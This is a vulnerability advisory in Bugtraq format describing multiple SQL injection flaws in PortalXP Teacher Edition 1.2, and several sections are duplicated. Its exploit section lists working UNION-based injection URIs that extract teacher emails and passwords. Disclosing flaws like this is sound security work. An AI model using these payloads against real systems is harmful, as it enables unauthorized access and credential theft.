PortalXP Multiple SQL Injection Vulnerabilities
BID:42504
Info
PortalXP Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 42504 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-3148 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 01 2009 12:00AM |
| Updated: | Aug 01 2009 12:00AM |
| Credit: | SirGod |
| Vulnerable: |
Richard Brynteson PortalXP Teacher Edition 1.2 |
| Not Vulnerable: | |
Discussion
PortalXP Multiple SQL Injection Vulnerabilities
PortalXP is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PortalXP Teacher Edition 1.2 is vulnerable; other versions may also be affected.
PortalXP is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PortalXP Teacher Edition 1.2 is vulnerable; other versions may also be affected.
Exploit / POC
PortalXP Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/calendar.php?id=null+union+all+select+1,2,3,concat_ws(0x3a,email,teacherpass),5+from+teacher--
http://www.example.com/news.php?id=null+union+all+select+1,2,3,concat_ws(0x3a,email,teacherpass),5+from+teacher--
http://www.example.com/links.php?id=null+union+all+select+1,2,3,concat_ws(0x3a,email,teacherpass),5+from+teacher--
http://www.example.com/assignments.php?assignment_id=1+union+all+select+1,2,3,4,concat_ws(0x3a,email,teacherpass),6,7,8,9+from+teacher--
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/calendar.php?id=null+union+all+select+1,2,3,concat_ws(0x3a,email,teacherpass),5+from+teacher--
http://www.example.com/news.php?id=null+union+all+select+1,2,3,concat_ws(0x3a,email,teacherpass),5+from+teacher--
http://www.example.com/links.php?id=null+union+all+select+1,2,3,concat_ws(0x3a,email,teacherpass),5+from+teacher--
http://www.example.com/assignments.php?assignment_id=1+union+all+select+1,2,3,4,concat_ws(0x3a,email,teacherpass),6,7,8,9+from+teacher--
Solution / Fix
PortalXP Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].